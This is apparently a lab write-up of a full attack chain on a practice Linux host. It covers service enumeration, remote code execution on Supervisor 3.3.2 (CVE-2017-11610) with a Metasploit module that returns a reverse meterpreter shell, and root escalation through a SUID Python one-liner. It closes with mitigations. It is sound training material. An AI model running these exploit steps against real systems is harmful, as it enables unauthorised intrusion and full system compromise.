Post

Remote Code Execution – Supervisor Exploit to Root via SUID Python | Super Process

Posted Updated
Supervisor RCE Exploitation
Supervisor RCE Exploitation
By
2 min read
Remote Code Execution – Supervisor Exploit to Root via SUID Python | Super Process

Overview

This lab demonstrates a full attack chain starting from service enumeration to remote code execution and finally privilege escalation on a Linux system.

The target application runs an outdated version of Supervisor, which is vulnerable to authenticated XML-RPC remote code execution. After gaining initial access, privilege escalation is achieved through a misconfigured SUID binary.

Objective

  • Perform service enumeration
  • Identify and exploit a vulnerable service
  • Gain initial access to the system
  • Escalate privileges to root

Reconnaissance

Nmap Scan

1

nmap -sV 172.20.8.159

Result:

1
2
3

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian
9001/tcp open  http    Medusa httpd 1.12 (Supervisor)

The key finding here is the web service running on port 9001, identified as Supervisor.

Directory Enumeration

1

gobuster dir -u http://172.20.8.159:9001 -w /usr/share/wordlists/dirb/big.txt

Result:

1
2

/images
/stylesheets

No useful attack surface was discovered through directory brute-forcing.

Vulnerability Identification

Accessing the web interface revealed:

1

Supervisor 3.3.2

This version is vulnerable to:

  • CVE-2017-11610 — XML-RPC Remote Code Execution

Exploitation

Search for Exploit

1

searchsploit supervisor

Metasploit module identified:

1

exploit/linux/http/supervisor_xmlrpc_exec

Metasploit Exploitation

1
2
3

msfconsole
search supervisor
use exploit/linux/http/supervisor_xmlrpc_exec

Set required parameters:

1
2

set RHOSTS 172.20.8.159
set LHOST <your_ip>

Check vulnerability:

1

check

Result:

1

[+] Vulnerable version found: 3.3.2

Run exploit:

1

exploit

Initial Access

1
2

meterpreter > shell
whoami

1

nobody

We now have a low-privileged shell.

Privilege Escalation

Check for SUID Binaries

1

find / -perm -u=s -type f 2>/dev/null

Interesting finding:

1

/usr/bin/python2.7

Exploiting SUID Python

Using GTFOBins technique:

1

python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Root Access

1

whoami

1

root

Privilege escalation successful.

Proof of Exploitation

  • ✅ Initial access obtained via Supervisor RCE
  • ✅ Shell as nobody
  • ✅ Escalation via SUID Python binary
  • ✅ Full root access achieved

Impact

  • Remote attacker can execute arbitrary commands
  • Full system compromise possible
  • Misconfigured SUID binaries allow privilege escalation

Mitigation

  • Upgrade Supervisor to a secure version
  • Restrict access to XML-RPC interface
  • Remove unnecessary SUID permissions
  • Apply principle of least privilege
  • Monitor exposed management interfaces

Real-World Insight

Supervisor is commonly used in production environments to manage processes. Exposing its interface without proper authentication or running outdated versions can lead to complete system compromise.

Misconfigured SUID binaries remain one of the most common and overlooked privilege escalation vectors in Linux environments.

Penetration Testing, CVE-2017-11610 (Supervisor XML-RPC RCE)
remote-code-execution supervisor cve-2017-11610 suid privilege-escalation gtfobins linux metasploit hackviser
This post is licensed under CC BY 4.0 by the author.